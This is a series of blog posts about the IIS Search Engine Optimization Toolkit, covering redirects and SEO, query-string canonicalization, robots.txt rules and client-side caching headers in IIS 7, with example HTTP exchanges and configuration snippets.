    MaxConcurrentRequests
3 Comments
Filed under: , ,

In the URL Rewrite forum somebody posted the question "are redirects bad for search engine optimization?". The answer is: not necessarily, Redirects are an important tool for Web sites and if used in the right context they actually are a required tool. But first a bit of background.

What is a Redirect?

A redirect in simple terms is a way for the server to indicate to a client (typically a browser) that a resource has moved and they do this by the use of an HTTP status code and a HTTP location header. There are different types of redirects but the most common ones used are:

  • 301 - Moved Permanently. This type of redirect signals that the resource has permanently moved and that any further attempts to access it should be directed to the location specified in the header
  • 302 - Redirect or Found. This type of redirect signals that the resource is temporarily located in a different location, but any further attempts to access the resource should still go to the same original location.

Below is an example on the response sent from the server when requesting http://www.microsoft.com/SQL/

HTTP/1.1 302 Found
Connection: Keep-Alive
Content-Length: 161
Content-Type: text/html; charset=utf-8
Date: Wed, 10 Jun 2009 17:04:09 GMT
Location: /sqlserver/2008/en/us/default.aspx
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET

 

So what do redirects mean for SEO?

One of the most important factors in SEO is the concept called organic linking, in simple words it means that your page gets extra points for every link that external Web sites have linking to your page. So now imagine the Search Engine Bot is crawling an external Web site and finds a link pointing to your page (example.com/some-page) and when it tries to visit your page it runs into a redirect to another location (say example.com/somepage). Now the Search Engine has to decide if it should add the original "some-page" into its index as well as if it should "add the extra points" to the new location or to the original location, or if it should just ignore it entirely. Well the answer is not that simple, but a simplification of it could be:

  • if you return a 301 (Permanent Redirect) you are telling the search engine that the resource moved to a new location permanently so that all further traffic should be directed to that location. This clearly means that the search engine should ignore the original location (some-page) and index the new location (somepage), and that it should add all the "extra points" to it, as well as any further references to the original location should now be "treated" as if it was the new one.
  • if you return a 302 (Temporary Redirect) the answer can depend on search engines, but its likely to decide to index the original location and ignore the new location at all (unless directly linked in other places) since its only temporary and it could at any given point stop redirecting and start serving the content from the original location. This of course makes it very ambiguous on how to deal with the "extra points" and likely will be added to the original location and not the new destination.

 

Enter IIS SEO Toolkit

IIS Search Optimization Toolkit has a couple of rules that look for different patterns related to Redirects. The Beta version includes the following:

  1. The redirection did not include a location header. Believe it or not there are a couple of applications out there that does not generate a location header which completely breaks the model of redirection. So if your application is one of them, it will let you know.
  2. The redirection response results in another redirection. In this case it detected that your page (A) is linking to another page (B) which caused a redirection to another page (C) which resulted in another redirection to yet another page (D). In this case it is trying to let you know that the number of redirects could significantly impact the SEO "bonus points" since the organic linking could be all broken by this jumping around and that you should consider just linking from (A) to (D) or whatever actual end page is supposed to be the final destination.
  3. The page contains unnecessary redirects. In this case it detected that your page (A) is linking to another page (B) in your Web site that resulted in a redirect to another page (C) within your Web site. Note that this is an informational rule, since there are valid scenarios where you would want this behavior, such as when tracking page impressions, or login pages, etc. but in many cases you do not need them since we detect that you own the three pages we are suggesting to look and see if it wouldn't be better to just change the markup in (A) to point directly to (C) and avoid the (B) redirection entirely.
  4. The page uses a refresh definition instead of using redirection. Finally related to redirection, IIS SEO will flag when it detects that the use of the refresh meta-tag is being used as a mean for causing a redirection. This is a practice that is not recommended since the use of this tag does not include any semantics for search engines on how to process the content and in many cases is actually consider to be a tactic to confuse search engines, but I won't go there.

So how does it look like? In the image below I ran Site Analysis against a Web site and it found a few of these violations (2 and 3).

IISSEORedirect1

Notice that when you double click the violations it will tell you the details as well as give you direct access to the related URL's so that you can look at the content and all the relevant information about them to make the decision. From that menu you can also look at which other pages are linking to the different pages involved as well as launch it in the browser if needed.

IISSEORedirect2

Similarly with all the other violations it tries to explain the reason it is being flagged as well as recommended actions to follow for each of them.

IIS Search Engine Optimization Toolkit can also help you find all the different types of redirects and the locations where they are being used in a very easy way, just select Content->Status Code Summary in the Dashboard view and you will see all the different HTTP Status codes received from your Web site. Notice in the image below how you can see the number of redirects (in this case 18 temporary redirects and 2 permanent redirects). You can also see how much content they accounted for, in this case about 2.5 kb (Note that I've seen Web sites generate a large amount of useless content in redirect traffic, speaking of spending in bandwidth). You can double click any of those rows and it will show you the details of the URL's that returned that and from there you can see who links to them, etc.

IISSEORedirect3

So what should I do?

  1. Know your Web site. Run Site Analysis against your Web site and see all the different redirects that are happening.
  2. Try to minimize redirections. If possible with the knowledge gain on 1, make sure to look for places where you can update your content to reduce the number of redirects.
  3. Use the right redirect. Understand what is the intent of the redirection you are trying to do and make sure you are using the right semantics (is it permanent or temporary). Whenever possible prefer Permanent Redirects 301.
  4. Use URL Rewrite to easily configure them. URL Rewrite allows you to configure a set of rules using both regular expressions and wildcards that live along with your application (no-administrative privileges required) that can let you set the right redirection status code. A must for SEO. More on this on a future blog.

Summary

So going back to the original question: "are redirects bad for Search Engine Optimization?". Not necessarily, they are an important tool used by Web application for many reasons such as:

  • Canonicalization. Ensure that users are accessing your site with www. or without www. use permanent redirects
  • Page impressions and analytics. Using temporary redirects to ensure that the original link is preserved and counters work as expected.
  • Content reorganization. Whether you are changing your host due to a brand change or just renaming a page, you should make sure to use permanent redirects to keep your page rankings.
  • etc

Just make sure you don't abuse them by having redirects to redirects, unnecessary redirects, infinite loops, and use the right semantics.

1 Comments
Filed under: , ,

Today somebody was running the IIS SEO Toolkit and using the Site Analysis feature flagged a lot of violations about "The page contains multiple canonical formats.". The reason apparently is that he uses Query String parameters to pass contextual information or other information between pages. This of course yield the question: Does that mean in general query strings are bad news SEO wise?

Well, the answer is not necessarily.

I will start by clarifying that this violation in Site Analysis means that our algorithm detected that those two URL's look like the same content, note that we make no assumptions based on the URL (including Query String parameters). This kind of situation is bad for a couple of reasons:

  1. Based on the fact they look like the same page Search Engines will probably choose one of them and index it as the real content and will discard the other one. The problem is that you are leaving this decision to Search Engines which means some might choose the wrong version and end up using the one with Query String parameters instead of the clean one (not-likely though). Or even worse they might end up indexing both of them as if they were different.
  2. When other Web sites look at your content and add links to it, some of them might end up using the URL with different Query String parameters and some of them not. What this means is that the organic linking will not give you the benefits that you would if this was not the case. Remember Search Engines add you "extra" points when somebody external references your page but now you'll be splitting the earnings with "two pages" instead of a single canonical form.

Query String by themselves do not pose a terrible threat to SEO, most modern Search Engines deal OK with Query Strings, however its the organic linking and the potential abuse of Query Strings that could give you headaches.

Remember, Search Engines should make no assumptions based on the fact it is a single "page" that serves tons of content through a single Absulte Path and the use of Query Strings. This is typical in many cases such as when using index.php, where pretty much every page on the site is served by the same resource and just using variations of Query Strings or path information.

 

So what should I do?

Well, there are several things you could do, but probably one of the easiest is to just tell Search Engines (more specifically crawlers or bots) to not index pages that have the different Query String variations that really are meant only for the application to pass state and not to specify different content. This can be done using the Robots Exclusion Protocol and use the wildcard matching to specify to not follow any URL's that contain a '?'. Note that you should make sure you are not blocking URL's that actually are supposed to be indexed. For this you can use the Site Analysis feature to run it again and it will flag an informational message for each URL that is not visited due to the robots exclusion file.

User-agent: *
Disallow: /*?

 

In summary, try to keep canonical formats yourself, don't leave any guesses to Search Engines cause some of them might get it wrong. There are new ways of specifying the canonical form in your markup but it is "very recent" (as in 2009) and some Search Engines do not support it (I believe the top three do, though) using the new rel="canonical":

<link rel="canonical" href="http://www.my-site.com/my-canonical-url" />

In the Beta 2 version of IIS SEO Toolkit we will support this tag and have better detection of this canonical issues. So stay tuned.

Other ways to solve this is to use URL Rewrite so that you can easily redirect or rewrite your URL's to get rid of the Query Strings and use more SEO friendly URL's.

3 Comments
Filed under: , ,

One easy way to enhance the experience of users visiting your Web site by increasing the perceived performance of navigating in your site is to reduce the number of HTTP requests that are required to display a page. There are several techniques for achieving this, such as merging scripts into a single file, merging images into a big image, etc, but by far the simplest one of all is making sure that you cache as much as you can in the client. This will not only increase the rendering time but will also reduce load in your server and will reduce your bandwidth consumption.

Unfortunately the different types of caches and the different ways of set it can be quite confusing and esoteric. So my recommendation is to think about one way and use that all the time, and that way is using the HTTP 1.1 Cache-Control header.

So first of all, how do I know if my application is being well behaved and sending the right headers so browsers can cache them. You can use a network monitor or tools like Fiddler or wfetch to look at all the headers and figure out if the headers are getting sent correctly. However, you will soon realize that this process won't scale for a site with hundreds if not thousands of scripts, styles and images.

Enter Site Analysis - IIS Search Optimization Toolkit

To figure out if your images are sending the right headers you can follow the next steps:

  1. Install the IIS Search Optimization Toolkit from http://www.iis.net/extensions/SEOToolkit
  2. Launch InetMgr.exe (IIS Manager) and crawl your Web Site. For more details on how to do that refer to the article "Using Site Analysis to crawl a web site".
  3. Once you are in the Site Analysis dashboard view you can start a New Query by using the Menu "Query->New Query" and add the following criteria:
    1. Is External - Equals - False -> To only include the files that are coming from your Web site.
    2. Status code - Equals - OK -> To include only successful requests
    3. Content Type Normalized - Begines With - image/ -> To include only images
    4. Headers - Not Contains - Cache-Control: -> to include the ones does not have the cache-control header specified
    5. Headers - Not Contains - Expires: -> To include only the ones that do no have the expires header
    6. Press Execute, and this will display all the images in your Web site that are not specifying any caching behavior.

Alternatively you can just save the following query as "ImagesNotCached.xml" and use the Menu "Query->Open Query" for it. This should make it easy to open the query for different Web sites or keep testing the results when making changes:

<?xml version="1.0" encoding="utf-8"?>
<query dataSource="urls">
 
<filter>
   
<expression field="IsExternal" operator="Equals" value="False" />
    <
expression field="StatusCode" operator="Equals" value="OK" />
    <
expression field="ContentTypeNormalized" operator="Begins" value="image/" />
    <
expression field="Headers" operator="NotContains" value="Cache-Control:" />
    <
expression field="Headers" operator="NotContains" value="Expires:" />
  </
filter>
 
<displayFields>
   
<field name="URL" />
    <
field name="ContentTypeNormalized" />
    <
field name="StatusCode" />
  </
displayFields>
</query>

How do I fix it?

In IIS 7 this is trivial to fix, you can just drop a web.config file in the same directory where your images and scripts and CSS styles specifying the caching behavior for them. The following web.config will send the Cache-Control header so that the browser caches the responses for up to 7 days.

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
 
<system.webServer>
       
<staticContent>
           
<clientCache cacheControlMode="UseMaxAge" cacheControlMaxAge="7.00:00:00" />
        </
staticContent>
 
</system.webServer>
</configuration>

You can also do this through the UI (IIS Manager) by going into the "HTTP Response Headers" feature -> Set Common Headers... or any of our API's using Managed code, JavaScript or your favorite language:

http://www.iis.net/ConfigReference/system.webServer/staticContent/clientCache

Furthermore, using the same query above in the Query Builder you can Group by Directory and find the directories that really worth adding this. For that is just matter of clicking the "Group by" button and adding the URL-Directory to the Group by clauses. Not surprisingly in my case it flags the App_Themes directory where I store 8 images.

IIS SEO

 

Finally, what about 304's?

One thing to note is that that even if you do not do anything most modern browsers will use conditional requests to reduce the latency if they have a copy in their cache, as an example, imagine the browser needs to display logo.gif as part of displaying test.htm and that image is available in their cache, the browser will issue a request like this

GET /logo.gif HTTP/1.1
Accept: */*
Referer: http://carlosag-client/test.htm
Accept-Language: en-us
User-Agent: (whatever-browser-you-are-using)
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 09 Jun 2008 16:58:00 GMT
If-None-Match: "01c13f951cac81:0"
Host: carlosagdev:8080
Connection: Keep-Alive

Note the use of If-Modfied-Since header which tells the server to only send the actual data if it has been changed after that time. In this case it hasn't so the server responds with a status code 304 (Not Modified)

HTTP/1.1 304 Not Modified
Last-Modified: Mon, 09 Jun 2008 16:58:00 GMT
Accept-Ranges: bytes
ETag: "01c13f951cac81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 07 Jun 2009 06:33:51 GMT

Even though this helps you can imagine that this still requires a whole roundtrip to the server which even though will have a short response, it can still have a significant impact if rendering of the page is waiting for it, as in the case of a CSS file that the browser needs to resolve to display correctly the page or an <img> tag that does not include the dimensions (width and height attributes) and so requires the actual image to determine the required space (one reason why you should always specify the dimensions in markup to increase rendering performance).

Summary

To summarize, with IIS Search Engine Optimization Toolkit you can easily build your own queries to learn more about your own Web site, allowing you to easily find details that otherwise were tedious tasks. In this case I show how easy it is to find all the images that are not specifying any caching headers and you can do the same thing for scripts (if you add Content Type Normalized equals application/javascript)  or styles (Content Type Normalized Equals text/css). This way you can increase the performance of the rendering and reduce the overall bandwidth of your Web site.

0 Comments
Filed under: , ,

Today we are releasing the IIS Search Engine Optimization Toolkit. The IIS SEO Toolkit is a set of features that aim to help you keep your Web site and its content in good shape for both Users and Search Engines.

The features that are included in this Beta release include:

  • Site Analysis. This feature includes a crawler that starts looking at your Web site contents, discovering links, downloading the contents and applying a set of validation rules aimed to help you easily troubleshoot common problems such as broken links, duplicate content, keyword analysis, route analysis and many more features that will help you improve the overall quality of your Web site.
  • Robots Exclusion Editor. This includes a powerful editor to author Robots Exclusion files. It can leverage the output of a Site Analysis crawl report and allow you to easily add the Allow and Disallow entries without having to edit a plain text file, making it less error prone and more reliable. Furthermore, you can run the Site Analysis feature again and see immediately the results of applying your robots files.
  • Sitemap and Sitemap Index Editor. Similar to the Robots editor, this allows you to author Sitemap and Sitemap Index files with the ability to discover both physical and logical (Site Analysis crawler report) view of your Site.

Checkout the great blog about IIS SEO Toolkit by ScottGu, or this IIS SEO simple video of some of its capabilities.

Run it in your Development, Staging, or Production Environments

One of the problems with many similar tools out there is that they require you to publish the updates to your production sites before you can even use the tools, and of course would never be usable for Intranet or internal applications that are not exposed to the Web. The IIS Search Engine Optimization Toolkit can be used internally in your own development or staging environments giving you the ability to clean up the content before publishing to the Web. This way your users do not need to pay the price of broken links once you publish to the Web and you will not need to wait for those tools or Search Engines to crawl your site to finally discover you broke things.

For developers this means that they can now easily look at the potential impact of removing or renaming a file, easily check which files are referring to this page and which files he can remove because of only being referenced by this page.

Run it against any Web application built on any framework running in any server

One thing that is important to clarify is that you can target and analyze your production sites if you want to, and you can target Web applications running in any platform, whether its ASP.NET, PHP, or plain HTML text files running in your local IIS or on any other remote server.

Bottom line, try it against your Web site, look at the different features and give us feedback for additional reports, options, violations, content to parse, etc, post any comments or questions at the IIS Search Engine Optimization Forum.

The IIS SEO Toolkit documentation can be found at http://learn.iis.net/page.aspx/639/using-iis-search-engine-optimization-toolkit/, but remember this is only Beta 1 so we will be adding more features and content.

IIS Search Engine Optimization Toolkit

More Posts Next page »
 
Page view tracker